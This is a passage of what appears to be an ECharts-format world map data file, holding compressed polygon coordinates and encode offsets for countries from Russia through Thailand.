ˢ\"],[\"@@IũݥԎѲdyū͸˛\"],[\"@@ĵǒĚÛš\"],[\"@@ƏÿʒьھǦ˯ࠗʁ\"],[\"@@ǣȿƤʌ\"],[\"@@̳ÀűƾӘ±±ǋ\"],[\"@@ަƻƲǩԄĹƅɔÖӝȒ܆ɫ¿Ïሴҝ{ˑ̺äŸóÙ؍ΠïĠǋʺňhȱʔǤϩǔŪʼϵŮܶ°ѮÛƓĩÄĩÈź֢ХĦ৲ŏઊӵāāʬ¶ĿϺu­ŧ׫ŏŁȳىǂˆʣڧ_݃ƼҨȍÛƯ̑w͂ÔƁܹșʆuċƋоǷ˱AƏĨµǕ˅©ɀͷƥ۹̒ۗîϫǬȩϮ߳ŤεġޣOѵҌǊeȂ͚˹Ƿɳǂƹǳ̗lęʃπ͑կϙ@ȶ@ȶ@ȴ@ȶ@ȶ@ȴ@ȶ@ȴ@ȶ@ȶ@ȴ@ȶ@ȶ@ȴ@ȶBȶǜ\"],[\"@@՛˛׹įЅÀĳ϶ѴȎ͊b࢒˙\"],[\"@@͓ъ΢Ȟا\"],[\"@@ܑìНȤвĬࡢőƣʩ\"],[\"@@UǫګIœŪҥvεΦѺŤ୸ѳ\"],[\"@@ʐűƛȹٯˈռä\"],[\"@@ƫɼ૆δ@қख़Ɠ\"],[\"@@ȻëխĚن¸Ťå\"],[\"@@ذģԢʣཡȹӫÖ@Ҝ़\"],[\"@@ٗt݆˄Ԯů؛Ǉ\"],[\"@@ܱňҀȲ˲̹\"],[\"@@ЕĐdŒٚʧǁ\"],[\"@@ϿŷâԸ\"],[\"@@ठěʵͧ׿ɍėԩং۟ঞͅЕŝٕŨĪƕڿŀ࣯W৽ǌʌǶТطǸDǄఉ¯ΩƢÒ΢֜¸ΆǨɊ˨˱ļڒŀıɢಬǢѠá\"],[\"@@Ցµ˒ߎž־˷ߝá\"],[\"@@঄˝Ğ˳༕ä޹Š݃ąતіऎ~\"],[\"@@ؙh˨¼Ͳã\"],[\"@@ԍßǹˆ܂Lyȱ\"],[\"@@ԕʱ੻ɐ͂VǤƼબů\"],[\"@@ͲDĿŷ֙Àͨô\"],[\"@@ǍƟ˕¶ƎϠÂNă\"],[\"@@൘ƄƩሜãƩǱࢣƟધxᅭͰ͐͜ɐǯ\"],[\"@@йiȺϦЂȩȁǑ\"],[\"@@٤Ǖ֜юসɯࡢ@ඤ˩૷У܋ÔχȄǴ͂ՑkğʣޮΡջűСƞกŧӱİӧʵࡍŠ१Ѻ˼niͶπTūǒծƆײèै̱\"],[\"@@țſࠩþÎØॸU\"],[\"@@®ƝҿƪђK\"],[\"@@فWࡐŒɍĹ\"],[\"@@㎅ޡ࣡ʵȌđ۝ʛιêǗǧыZêɫ܍ǳUȵϋÎȖƯӟʕ҅Í஡ƀקđҋΒ݊ǌזϮڞÞүŌޔˤׁƖȎÎ҈ăɰɆٚSϜ˒ۖǊ୮Ȯ֎qɔǮ๨రŢᧂՐ۬ÝϦȏ঩Ё\"],[\"@@࡟O੒ƾȱƭ\"],[\"@@̹ЊìďĹ\"],[\"@@ƇȞđǈըƦǂАC׌ɯٮϸŞ;˾࣬ʟƬĎÔ̪ɀĢΨդʲࢰӮΎƽʶČȘ̹Ķۙɵ˗RνƃșțౝKȓʺÒ˔ɃɖBɒ̛דкη]̣ȎסϗȞ΂ɅŠ}̜͏ͤө੘׉ֲӗƊəÍৡΌᔹɗݡйuŻӴÇĀЃֵеݹ৏ƶŃïǱڷȇӟ˥৅ʼōĆǙ¶őéDǩ·ŋÝsŉLƅTÃ`÷ɫǄɕĄϏ؉ɣŅÅŃÉŻÝÓĕÛş¡ĝĝaǟtΑĝճçý\\\\ō©̓řıoɿÞęGĹ֝ČÙvǻԻWùfĭ°χɐ£ʚʇʅHĩF÷đ®ċĢȕĮŗ`ǥUų[ۭƜયˏϏ_ŗvÙnį\\\\࡟͔zŐďĤiȄ¶SĞdG¬ŏ|ƃȿǃ]܁ɖÉZȩHǏNħfǝĮۛȸɅˇҋˉɷнńŉÞǭ¤ÈÚWºo{șȷʍէɭŵUȇŸ֝dȽĈҗñΉpƳĞĳJýI_»G¥ÄǭŒēˬ९¢ƋƤëXÝUËµw¯J¡ŷàÑ¼¹[ēű͙M̛Ɵ­×DMÇUǱƷûßc¹ԍŇ·ǅTƻ×cĕá£ŷ`mÁÏ}ďyVqpWáǕυµÏgĿñ«mķC©FȷċÿRבВ¤ǶгɷߕĮȱϐ֕ƬͅҊӳȂԃďɣƑࡷXßǼˇX²ȈͣĒʋġqȥοƝᅁᐴିوÁňȞMƶʠ୳̑ǻǏ٥ȹċƅбŎϝƟčɔ΀ˮЛíԛƪƧǉɕ͒ƳĵމNþ͘ϕצұţৣȐ٩ȓ§Ʒᖭ̓͛ʃՃᒁοוÔɃͭҲĉʱÝ}ƃϰ¹΢ȇࢇɯʟȄ˵߷͹κʁࣺ˛ƓϵϓƑѣa̭ƞȷɥʏõÏņӍØѱ̴ѧxͭǝαƨѧڱν࢙ήñЍΑъکψ٣@̏ȒܿȟƱƠ̵èҟσػǥƥșוȩŒֹΣÏՉѪɵiґ։ñˣȖǻˡ́ͣͼƯȒЯǄÂּăږ޷͵caŵ׆ɥҡɁǃȱܓ̍ƛĄÈųƭʿե׵ԌͳžҡƺˢƷ܋ठ৅ځէЇêӋѾˍàǽĊӗǺG|þȬkpţȁKƵŪõfŇÓviSáŉáþ¡tř\\\\ƩȏñĉkyōJÅnknVYƅ¾ÅϿŨõ¼Qșàয¦ĵ´đ¶ɱšş¾Ź®Ӂh»ËųWॿۆ҉Ōˣɼ̗GʓɸӝƮ˂ŜȃèŪ²̈ŽθĘǀːξæÆĥĔƈʺIӡˈŭȖؠx½ŲܖʘćƎƟFăą́sǮĤҡƛżѦҀȶ݈Ʈ͎Ĺɰǅ¤ŮǼǰ\\\\ˉƾ΢Ȳy˚ʥIԗʆɍևȒǱōԽЮګǝхǘѳɻ֦Ȼƈ܋ªýΤɶĐ֍ӄથʿɍ̟¨IrÉĂ¡nqxPȄiȐ}ûÂ÷Òµ´xĚĺp|Vζ÷ʖ]˞ƮĞÈb¼Pɇˈȿņǩ`ƟIÇfÒŀXÆW~tƍ°ȋîĕĄĩƊġäĴE^}př ƻôOn\\\\°t®ŰŖ@g¦åðÁ²GzVpäÈLƢɿĆ͡ƮǇQėR±YµãsħeůÉÍ¹ºlżࣷİŗò®İS²mÒ·ļOǯǐUê|\\\\ƕkǈ̌P¬SpɏĨwà`ıH¢ŜŤŐȤÒɵ̎Ëӈ׼ӲśĠʢɶõƸƀΰiǘƞࠎŁ¦ìϛȦշEΧƸŉʪ׹şཤࡔ఺޺̆ͼ̑˖ৃѶњʊTƮЇȲ˔ϿǠȈƪǿĔĞ͂͘Đࢋঔޠٶեͦօņǵʤʪ̝̐ÂҪĲΠɶטŔþǠֲćRȶ֬ñϚĨYŦ࡮șýĵإÔǚǏԺQiđЎ¼ˁ̟ҘȮᆤı༼пט˯ड़ʅɊ[]þӒˍӰıͤчƛ͏࣯ѵௗșᥟ˞ׁǸ˻»Ď઩ǌȁȰࢇÚ๖׿ʛħلĕӢɯîƷ̵̹Ոߥ٢ĕӀ˩ࣞǃѶŖĀŤĝȔ٧öҹ˼÷ǂ̈Ȟᝂԃʦǎ͘PիӒfȼආѴؠͬ࡮ĕΜƑģŃʪfɖő˚ްիˈΠ࠾ܷΜ׸ĿༀËڤՋঋûՃ˿ֈȑ˖ʛԜù঎ƨȀԞ߬ĆáǸͶsᛶ֘͸ƽ˚Ŏͅľ௪͚ׄE׍íŒЇ֝Ɨ৺x͖ýҴ̮Հæ࣪āࢠ˰ݒĮ˂ɣɫʛՄûƜ̖ӾnώɐٙԖبɌ᪂ʿפʋᄚ̽଴ҹ٦՘ԇbҋњ͋ĖҹĠƗŝ͚঺šĊυeÁɚൊԐ૾તłą๚zાȇȧ֭ץү۲гŅဵ࡞УϝʧÓΏਁٓЙƤɹۃƏ˽êʸŦ΁¹ͿƆևaǡƲǭ४ȣࡦdҸħ;ðĄȔୀκʂΚ׎̐ͅռǂ˦౺Ȍ̐DټёÃׅԈǫॴh૫ƌÜςˤÎ˿զ൳˨ӣHԗůࠓ¬ɑֈ٠ٴ੍ܮӮʹૐʦǣ֖̮ӶҳϽ˳¸ԯആǵֈؚȥԸHŢÌзQ̿ɮ๻ʊͳ̞۶ĺހǑϤĮǻŞѯikĶوƼ৔F૸ʓݲ̻आ¢Ўăމ΃ƅ֋¶ǝծҸƊ̧̽̇ͰĽMƸ֌ɨӭҶ͒Ӥ˫ǆұ¨ҩ˸੡Ȉ^ϰΕʂƆ˴┰Ÿ්Ɣऍϗݔ˥ا̌঴ƄϚǒ࠿ζӍÔͨŒфĽ˨௃ʀΊƞϚő͞ĆΨȠѹ°ÊĐ֒ᑜϲ὞˒হE̴Ǆዎк±ΟǃܖĨWĩᆒ̐ञǵȕȗʼŎsǦࡧ̂ႌيï֛Ĳ¾θശѤ୼Ȇႜ˷༙ʍᘪÉШĝࡡΏસTϮǺ᧮§מǧŵċ֪Fˣ԰ǖʔ̟ʘ|ʏ̑फɘцɑʌОƉڧλᣭ׋}ŷഡЍޭÕӻʑЫm࢛ѿӄº٨ʬ੮೤˄Ѳ_࡚ɒউZҰɰڜßÚĪΚq˓»ƢşظĳհǼǒ£͒ɟɓǁˬħ̧џҌǑϗƠ֞Ғ́ƆໞǔᲄƑΏÕuǽૐɣᑔĉаvřĸҞÕϲȨōЊࢨîࢴʭրĎʢǵЖǴ׬Åଢ̳уǽΘmȞƕۧƛܨćňɫЍñ्̖Ł࣐ҫʤƊɀƩԯÛޚҙٴȑȂÐɞǻ࡜мԲֶ࢈Я࡜ܚȈҀT༌УăĀЂĊͩ¸ˆǲҞΰƹٲ ɕ̩ͦÈۢȪࡗwƔϮƔఔúɫʰ੆ƛ⇈ɻcû௫ԙĻŀÇᒌĒ׽̍ĮǊЅöCʇ׉]ŀȗݒĦৄѨሪƍѠɥ߿čãĕൎƝхʙܶżԬÿєɛˣغů↨ɒଐ­ૄȽվЗɷσ঴ɝŀяɲĭϡϋ׮̮{ЌՈȜࢊĒᴴǷࢊȔϒϥࡐǉʤʙެϪȂ΍ҎΟ˜КᚔʅƊļᐜ©ᬐՕؐɳ@ᾕకϵ٫Īܱ̪ҏג¡ƼřŻÙࡏƤ౗ɵ౎ȄʜǗǭĵઊƬLˋɈŝ̜ïƺŪŸē̎ӿʓ½ʬǯ¤ŪԄͥŇśʾˑϙ̭ໟɺ ƶ˅IŖǹᕩإݟěЯʹɱÀ¨ƁїŧEėງՃɍЁ̱ĐًѼࣷmއƕߡҧŗļǺь੣͗ŋɉέǾΉƍlð͡͇ȷûЕ्ܕƱ̷β̟ɚȚӔƃϑεXЛŌŷˬâϣʍǁǧlǱƔΈʒ̯ťȕϋƝ̡ӽ͎سЙȣ܏tו̑șͽƴջρĞ۹ˡɯľŘƅĭЫ͛ӕ੍ڭċȏΊſैɇ̚ЫှÅОάଆܮԄņƨŭ˂ԸhǺȄԞU޼є՘Ԟྀࡲ˄˄ൢϚſĠϞˌǛİͺۦ͠ƬԢąǬÖ࠽ɐࣱŹˁևȪǇƟŇȕŒϳൃރӽīǦ͚ӵÍѦ߀ٍƥ̧ǮळƧԍ͓Ľ଱࠱صʱ֫җťʯےáǄɓםvϓşˇŲ˫UҗʍлĖțĵٕǣǨड़Šދ˴ܩÇƸ¾ࡳǶӝŝŞţ΁­ƅȄIȥġЁƀرūࠏǂЧʉеȲጥԣŉຑ޽˿Щ຅܉ࠃۛᎯ৑IǯԀůߒßۇξd]̢ѴĐ˝ƷжŹӥͳה¶Ӟ̘şˍʛǜZȾ˪ή֎ė͚ìֱּ࠘ʭǉɷ˻ÔΔȹĻͻ̒ɏıɏηʧ΋ۍĔ׽ƋƝ°˅࣓̅೫௻Ƚћշ؋ಗૣɣīر܇षӟ܍ɁϙƮͽPJβωǿÔǨٽ֧ϗ~ŀőŭȃ\"],[\"@@ǵÕࣇè੾Q\"],[\"@@ЅΙ୚˂նɥ׎½ƖˍӑƇ࿏ŵ೽Hෟǹჸା֊ÿźƪЖƭ\"],[\"@@ૺű߃O͵Ƃ\"],[\"@@ળŴŭǐᓘŁवȁ\"],[\"@@ો܂ĨЊų\"],[\"@@٧|ՀŒŨƍ\"],[\"@@mͯߎʖ௸ɳ͉ϟ՝}ݚ˧ౣƣᝋʼѕک̌७ĀྔԐʜÇ፤ņ\"],[\"@@зì˞ÒƚŽ\"],[\"@@ûɻথ`ǴɈࢮT\"],[\"@@ফzіǄ࠼œ˥é\"],[\"@@Խɏ˰ᆲųܛqχǏ\"],[\"@@ԓFÆňҎō\"],[\"@@ࡈ¡ȨơࠓŎೃˋƟļࣃᒌȲ\"],[\"@@ûǽࡱǕٯÜՅÁµ͖ᓚd\"],[\"@@நȩᝣ˫ƖǇਭåƀƂݷ±̅İ੄ȔৈYƂʲࢄĘ\"],[\"@@ޭĴŰࣀUɅď\"],[\"@@ࢿ¤ୈĖˇŹ\"],[\"@@ๆįञȱීŃ৷ĢԻŐ֤ȴ\"],[\"@@ʶǭէÇࣙɄ۶ĐӖÝ\"],[\"@@ٿźᇮ̀ՔɟჁș\"],[\"@@˿Ý૓Ěඔ{\"],[\"@@૾ʿ܁ȑɰəᵥɛᅋ̌ศζ֛UĲüᏘͰՠTؐǣ\"],[\"@@وŅף§õǕႭfȿļጀȢ\"],[\"@@ಛÐഔP·ß\"],[\"@@ƉĦॆvĂāࢽ\"]],\"encodeOffsets\":[[[150236,44794]],[[149717,45566]],[[152166,46406]],[[153281,46738]],[[155651,48023]],[[158526,50496]],[[159664,51510]],[[160159,51874]],[[146188,55700]],[[140471,56423]],[[141252,56415]],[[21746,56591]],[[170650,56156]],[[154205,60436]],[[167563,60010]],[[36676,66747]],[[71702,68099]],[[-184113,70595]],[[51472,70847]],[[165343,70555]],[[173262,71251]],[[61902,71614]],[[54174,73078]],[[183155,72527]],[[141271,73224]],[[-183169,73295]],[[79496,74027]],[[81410,74468]],[[76453,74623]],[[123148,74844]],[[56648,75068]],[[72371,74850]],[[145598,75670]],[[85555,75850]],[[144395,75776]],[[116109,76187]],[[88733,76781]],[[84145,77230]],[[150319,77180]],[[139212,77220]],[[143410,77649]],[[98850,78109]],[[115178,78460]],[[152730,78500]],[[69392,78068]],[[98597,78876]],[[91663,79042]],[[133824,43318]],[[110281,80007]],[[105354,81157]],[[78079,81563]],[[94908,81598]],[[52644,81863]],[[61122,81875]],[[100019,82083]],[[51254,81997]],[[58449,82280]],[[54806,82110]],[[59348,82047]],[[55722,82405]],[[48581,82795]],[[63660,82775]],[[51485,82870]],[[81948,82789]],[[62609,82894]],[[56033,83063]],[[60030,82987]],[[64895,82637]],[[93765,83089]],[[98844,83022]],[[59198,83504]],[[65179,83568]],[[59695,83677]]]},\"properties\":{\"name\":\"Russia\",\"childNum\":73}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@aM¡Ýľƅà{ª½¨ĕÂӣkĹuÕÇ¡PµSÁoEŧòʓēƿÞ¿̓ƛßʵ]ʍǴóĽĵîcȢɊǤÆЌ͊˨Ⱦ¬Ėœΰͪ¬X¶EA\"],\"encodeOffsets\":[[31243,-1092]]},\"properties\":{\"name\":\"Rwanda\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ÔôĈț̙ǪºȊńʋ\"],[\"@@ݶęȨϧ٬T̮իWƟφș¿¯Ȗɍضѥš`Ǧ̵·ǩĽVѶࡱĞĻ¸ÿâãľǍk´QÐ@îløjÐÖNďȗɒ­pǩߴ३ᒤʽèèϤם֏။ᠽ࠽ុΑܵΥӽשř˱ʣƑƕNȻʾ৉͙ŀਙđлǈȑƁu֛̫ˉыࣂҙϚѧژЃ֭ࣞі̑ľϝӬƵ˰®Ǭƅ̦ØװԇऴқЊ́Ě̥ѺîŠį˦࿿ᘲϩĄćÅ˜઎लŷǶżǌŞĮƠĤƒª׶ňlbÀŒäƘbdhdǌĂİ´сѐ̽̈ūŘɎÄɺÎԲžɜÈӲŮZŰİȊ˰£˖¡˼±ĠഄڿෘਙߊսൠŉƦ\"]],\"encodeOffsets\":[[[42996,17117]],[[47649,29795]]]},\"properties\":{\"name\":\"Saudi Arabia\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@²·˦БAÍęÄSĹªܣɺધड़ۃƿƳsWwWuµmi[ЃŃȡőµƯƋIá_ĝh©C[gŻFÇùƧt˟̇޹ŝȕlǉpǟ¬ЗͯఽϣőҷڳƱߝƇıǗŒȑȅϽȝؕǥü̘³ˎٵӄ³ܢłԤБL^ǵ֑EɢʝèԷ৏ઑЁËكҠͯǳōʝбƥŕɥڛFƙɰڳXΑŉةּ½ȦիÝŧɿѥɇݙ͓ȅԟŴÍʤżȎpМډआÀΨ˥ȠUΈĝàĵӾΣdđĦ͸ҐĹЂζ̦Ɓ͜ʐƠɘτD̸ƞƜܮfRṴ@о࠾NBဲᢴ@ᢲAƘPŞǚð¯©ŷ⯀B\"],\"encodeOffsets\":[[37757,22525]]},\"properties\":{\"name\":\"Sudan\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Iޓĳď֡Mʁҋݼ͟ƊʃլӅɰګʆ̫ƷƱǥǝȧȟɓɉǟǛǛǗȟȡơơá³Яŀ֋ƣǗƽ˳ʂɁĿͩĞˁʛåŒƝ@ßǰˁŬѣԖǩtȳȁлĨʥƳȡvͻʜ͓϶ɑԪՉ̄ǥ͘®ưࣩږćŊhɂ̇ˢҽżŧ͔̾ȆɈݚʀѦŨլÞ¾ȥتֻΒŊڴWƚɯڜEŖɦвƦŎʞͰǴلҟЂÌ৐઒çԸɡʞ֒F]ǶВKŁԣ´ܡٶӃ´ˍû̗Ǧ\"],\"encodeOffsets\":[[34896,9689]]},\"properties\":{\"name\":\"S. Sudan\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@¬̍ǬɃ¸˥ÿȯȈˉǒ®ȶΫBҋࡓÃҁǊŉkŦի˯BʅB܅HƵùǑĉɝ«ʯhć]ƥÙĕgŕb¯S£ƞˊìŽĘũŉgДĪøۄFjƘѸÒŖƈݼˏΜƠųŖέםʸˍíçşࢫBǣˊŲŖƣ̓ՖƫöĉÝùĔ͜Ɩʮ̺ɮφĔânưĜǞ˞ЄٸǊ׆ąδεĦr̆ħʰХ̶υ˜ȯņã\"],\"encodeOffsets\":[[-12575,15165]]},\"properties\":{\"name\":\"Senegal\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ˍKƘĸŶī\"],\"encodeOffsets\":[[106465,1364]]},\"properties\":{\"name\":\"Singapore\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Ͳ´ŻːVѺїʋēڧѸصƠZŀͯސµ\"],\"encodeOffsets\":[[-37993,-55363]]},\"properties\":{\"name\":\"S. Geo. and S. Sandw. Is.\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ùMÚĊ`û\"],\"encodeOffsets\":[[-5828,-16381]]},\"properties\":{\"name\":\"Saint Helena\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@őaϧːӺʭ\"],[\"@@ȕÿĥÈȜļĠă\"],[\"@@͞Çɦ̳ӱĘȽŶ§ǢǉVĺΈƵ\"],[\"@@NŧŧôˢƸɭ\"],[\"@@ȂƇ͔X϶χƛÅ܅ƒǅʘ\\\\Ɔŀ\"],[\"@@ȪŧʫºÂî\"],[\"@@ŷ¤þèĊÿ\"],[\"@@ƛ«yƞǐ|Fŭ\"],[\"@@ƩŰƖŨTʗ\"],[\"@@ȼʡ«ƿǶƋǬձԃծµΤĽƖƆ¸\"],[\"@@ŔɝßėșƔ}ƨɋÁíÐɰʢɮɵ\"],[\"@@ǳĀÆŬƌÕ]ƕ\"],[\"@@ƩǺ¦ŒȼűķǙ\"],[\"@@޻дУиɶ¹הΥΌʡǩ\"],[\"@@ƋP¾ĮĎĽ\"],[\"@@ā˷ĐկּӠɇƌɥʚƛ\"]],\"encodeOffsets\":[[[164431,-12081]],[[170121,-11015]],[[165597,-10636]],[[165425,-9856]],[[163585,-9495]],[[164013,-9211]],[[163010,-9342]],[[161903,-8892]],[[161167,-8922]],[[164608,-8513]],[[161550,-8439]],[[160944,-8302]],[[160449,-8113]],[[163717,-8739]],[[159580,-7267]],[[161267,-7506]]]},\"properties\":{\"name\":\"Solomon Is.\",\"childNum\":16}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ΧŔ˲ÈĒ¯[ū\"],[\"@@ÚăIy½śFwh[ĤmĬ̷ƩʋÅt[R¤UG¾ĒĴ^ÞUE{ţĻǯįÝʽȗȃ͝ʱȩ˛ࠓЖL̰ǽŹĒė˜ǉÎĽǺǀKǈǤʍ«qɢŮȝƘǸjĴǌǠĢǔ˦ŊǌʊmȚİ՘HÌer«Œśʐ͵\"]],\"encodeOffsets\":[[[-12826,7615]],[[-11016,9611]]]},\"properties\":{\"name\":\"Sierra Leone\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ȰԞ͡P]N¹^§ErŐÊŀƈĝĊ`øIÐ£byÇʕű˹ىĐƤćક͂ʓƪ Ɩт˴uŰǰt\"],\"encodeOffsets\":[[-91507,14762]]},\"properties\":{\"name\":\"El Salvador\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@įehɼĈɕ\"],\"encodeOffsets\":[[-57617,47963]]},\"properties\":{\"name\":\"St. Pierre and Miquelon\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ŝ¯©ƊȀƬÀƉ÷Ļ\"],[\"@@ýìĄRŋ\"]],\"encodeOffsets\":[[[6820,124]],[[7602,1606]]]},\"properties\":{\"name\":\"São Tomé and Principe\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@tƱ­ăĿƣ_ŧcĳO³»ĕũɃőıAMWQBqèŻR¥ ¨U¤uGÅQ×Pć¡·U¡̃ȏĪmuĕsyoQÄm®á¶¿ ±K¿O÷ùϳČȅĂбۈėѲ˿b΁תǪӈÑŸǦƜ͌|ĸƨğŞľǴȌώؠě˴ƻWǌɘþۄFټƱuʱͱ֓ňځˈΥ\"],\"encodeOffsets\":[[-55331,3717]]},\"properties\":{\"name\":\"Suriname\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@]œƃÿƿŷįWƍ̩É˅Ƕ߱sſș͏ů˙Ü۫ȇÉǳ߱cԫȤɿ͌òǲƶȰԼ ˞ƪÚǊ֠Ɉˈģʘǖ˨ȍcƗʨoʲǢьÏǰĔҺM͌ǝϠŅÆQ\"],\"encodeOffsets\":[[23080,50251]]},\"properties\":{\"name\":\"Slovakia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@õręVǷŷйǭaJàĿoĹ̿ŇÞÕÏãPZćuŋTſ¤ƉkťĀ·âmLiyãíµqЭ«ʧöɢÜYòƗĤÁǂùKkZOnN~¾¦ÌfrEhǯkĘƎĈØ\\\\j¶܌ĵ̀ǦࣄÒŖƼǆKȜ̛\"],\"encodeOffsets\":[[16913,47616]]},\"properties\":{\"name\":\"Slovenia\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@će˚Ԧٶзࢯ\"],[\"@@əŇĀʷٗБŞƎűЊͶɰ̨îƨã\"],[\"@@Ïµ¤Įǒeƥ\"],[\"@@ࢭÍכłūɝׁǃūǕ´Ǝǉλˇٍ͎̃ԃᅿ׃ʙƳŴčʗęɛĈŌʋǟćΣLȈɳɑ̭úƵɥÇůĸܿΆƑʜ®ݮӁİɥࡋͯԄɱʇવϣٛc׬ťɫ·@޷ʫړѭӭ࢛wŇ̑±ƽŧłʯƗŋઋ^ô˲хҖˤuŧƪǜXtƒϱʐࠅ৲eȆƵzďԶ¤øǊêŃƠbž̨įʬڰўḔʙҪΌ¶Ƥʖ؋̴Ůӄʭࡌƨʰ԰ͺΊÚَ»ƲƆÁʔΫİۤ؂Â۠߆ƪ»Ƹ࠘ӆɵ̸րЀҔǬӼś͘ӸඖǗ͆вșƠь`ୀџܚŹڈ΍ƹгɼýʙ̈ˋʍҷϤϓ\"]],\"encodeOffsets\":[[[16926,57642]],[[19535,59224]],[[19617,59313]],[[24736,67385]]]},\"properties\":{\"name\":\"Sweden\",\"childNum\":4}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Ħ»eɛÄȧNˍóz}MwţkǳZŏǹGɯ^Ǐ´ǯłĿǔ¯ļÛNYlR̎ʈζĴŚņô ZGьȇvX\"],\"encodeOffsets\":[[32715,-26580]]},\"properties\":{\"name\":\"Swaziland\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@DýƅƪÔ¦îő\"],\"encodeOffsets\":[[56874,-4805]]},\"properties\":{\"name\":\"Seychelles\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ӏї̹éĵŋ¶رƅܷǩ˷ᇳࢳ࿥ࢱϑÐӫ̈łǸМƔź£Ɩ͈òñðʴʞãǰƥÊ°Ƅ΃yÕڔśŶÚɸ®ÊØMƈßvDǌƜzƘɖÀJ|ēǎR¤¨ǐÜ~rĲSƒ±æ¥̶SôǒÆƾ¨ʈĜӘǫŠDǜ]ȾBŨlƺˤòׄɮ঴¸Ƣ¤ĜêR_jIķ\"],\"encodeOffsets\":[[43376,38000]]},\"properties\":{\"name\":\"Syria\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ǂ·ǇFþ\"],\"encodeOffsets\":[[-74068,22376]]},\"properties\":{\"name\":\"Turks and Caicos Is.\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@QṳܭeƝƛC̷ɗσʏƟƂ͛ε̥ĺЁͷҏĒĥΤcĶӽĞßV·˦ȟ¿Χ̭Þ؇̓ó̓އݑαɹ୕ǁÏđȈƱқԡޑ½ܩεȩ˄ƕƵΝƧБbÎɜη٨ڃլ̗Шɢʎஊx͇̌ťʖđϸªؚȟւ͕Ѩǻ²ƱBōư˛ϒčΰµȸޜଶच঄ɖᠶȔΐ͘hȆΥӌǟఊࡊϖ←ႱỨལ\"],\"encodeOffsets\":[[24556,19965]]},\"properties\":{\"name\":\"Chad\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@řԛӈ͝²ՓǸʽrႫÿIȺוŽßλŃϙ̨ǯͰĞцœǊƾڸˁͼĮüҢʗÄĠŠßĮլϻ͎Ą̈ßĂҾƉ΄\"],\"encodeOffsets\":[[923,11258]]},\"properties\":{\"name\":\"Togo\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ĥŁt͠ĨåuƷ\"],[\"@@ĝƑmŜŌv\"],[\"@@ĿOqƞŲƍ\"],[\"@@O¹tWƬŠǞǩĹΟĬǟזIT½oƅö̍ȩ҇FòĵNťȡҹ Ų½ÀfȸȂŢĀRRļÌôŨ´eÔòôÈ MǢƁĚ½ĀgÄō_hL̸ǤĠ¶ì¨ÂhbvFà^ĸIŢƎÅĚk¨pĊđŮȑńơĘįʾȥÜƉ³ȉ_ǉNȣÎƳȒʱĐÉƴ±Ú¥MƃȊŉfCÏoćĿț@ŇïZğoõsɅk»­·ã¯ĉ£»k[S±«­ʛǜೡăʑǏ̧ҩǭsƎݝɌȳe˱ǔ͏˷и­ÿףҀ޿\\\\Äٺ̟Ŗ̯éȵȭČǕŁ̗rѧە།öࢯӦpżחŞƉäĮȫɠ࢓ę®·ɖąTwȊăƧɚΉԂ˝ЖJԔԻȑΕǏĹňωɩōŒÒІƯFĳǸ΅øëŐţȭΡκrȖƕĨŘȧbăȸƻČuƜəƠíǒĽôƃƓĭ¢ÁҖϰ஠°ЄζώΦ֨ǭ٤ɿМ\\\\ּӉզ̱ԮUȒ̮ƐֶȎŌÐƞ«Æƥñȅժ؛ے×вɑȒ̺ÐÒܺǖʐ̚»ҜìƄ˜Ί¨wǴɘƜĊÄQ¤Ĵ¿\"]],\"encodeOffsets\":[[[100771,8092]],[[102473,9817]],[[104886,12277]],[[102526,20805]]]},\"properties\":{\"name\":\"Thailand\",\"childNum\":4}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ĕÃÏÔMh^@Î_ĈW\"],[\"@@̟ɝՏȔлƳF}åÇ·ly§ù¬ʩৢÀʢǉ֞Ǭk\\\\yWCȔ± 